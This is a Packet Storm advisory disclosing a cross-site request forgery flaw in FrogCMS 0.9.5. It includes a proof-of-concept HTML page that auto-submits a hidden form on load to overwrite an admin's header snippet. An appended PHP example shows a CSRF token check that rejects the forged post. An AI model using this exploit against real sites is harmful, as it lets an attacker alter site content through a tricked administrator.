FrogCMS 0.9.5 Cross Site Request Forgery

2010-06-12T00:00:00
ID PACKETSTORM:90592
Type packetstorm
Reporter Jeremiah Talamantes
Modified 2010-06-12T00:00:00

Description

                                        
`# Software : FrogCMS v0.9.5  
# Author : Jeremiah Talamantes for RedTeam Security  
# Date : June 10, 2010  
# OS : Windows  
# Tested on : XP SP2 EN (Virtual PC)  
# Type of vuln : CSRF  
  
# Description :  
# The application lacks security controls to prevent Cross Site  
# Request Forgery attacks. The POC below will open a core  
# module (snippet) containing HTML that is rendered as the  
# "header" for each page.  
#  
# An attacker can trick an authenticated user (e.g. via an email  
# phish) into visiting a malicious web page (the POC) that is  
# designed to overwrite the contents of the default HEADER  
# snippet.  
  
# RedTeam Security / RedTeam Security Labs  
# http://www.redteamsecure.com/labs  
  
# POC Code  
  
<html>  
<head>  
<title>FrogCMS CSRF</title>  
<script type="text/javascript">  
function myfunc () {  
var frm = document.getElementById("csrf");  
frm.submit();  
}  
window.onload = myfunc;  
</script>  
</head>  
<body>  
<!-- Update the form action parameter to match the victim FrogCMS URL -->  
<form id="csrf" action="http://localhost/frogcms/admin/?/snippet/edit/1" method="post">  
<input type="hidden" id="snippet_name" name="snippet[name]" value="FrogCMS CSRF" />  
<input type="hidden" id="snippet_filter_id" name="snippet[filter_id]" value="" />  
<input type="hidden" id="snippet_content" name="snippet[content]" value="FrogCMS CSRF" />  
</form>  
</body>  
</html>  
`
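
The PoC form above carries only the snippet fields and no per-session secret, which is what a synchronizer token addresses. The following PHP sketch of that check is an added example, not part of the advisory and not FrogCMS code; the function names and the `csrf_token` field name are assumptions, and plain arrays stand in for `$_SESSION` and `$_POST` so the file runs from the CLI.

```php
<?php
// Added example (hypothetical helper names): synchronizer-token guard for a
// state-changing POST such as the snippet edit form. In a real application,
// pass $_SESSION and $_POST instead of the constructed arrays below.

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to place inside every form that changes state. */
function csrf_field(array &$session): string
{
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '" />';
}

/** True only if the POST carries the token bound to this session. */
function csrf_check(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject missing or non-string values (e.g. csrf_token[]=x) before comparing.
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// --- Constructed demonstration data ---
$session = [];                    // the administrator's logged-in session
$form    = csrf_field($session);  // would be rendered into the real edit form

// Cross-site auto-submitted form: the session cookie is sent by the browser,
// but the foreign page cannot read the token, so the field is absent.
$forged = ['snippet' => ['name' => 'FrogCMS CSRF', 'filter_id' => '', 'content' => 'FrogCMS CSRF']];
// Submission from the application's own form: the token field is present.
$legit = ['snippet' => ['name' => 'header', 'filter_id' => '', 'content' => '<h1>Site</h1>'],
          'csrf_token' => $session['csrf_token']];

foreach (['forged' => $forged, 'legit' => $legit] as $label => $post) {
    echo $label, ': ', csrf_check($session, $post) ? "accepted\n" : "rejected (403)\n";
}
```

The check belongs at the top of every handler that changes state, before any snippet data is written, with a 403 response when it fails.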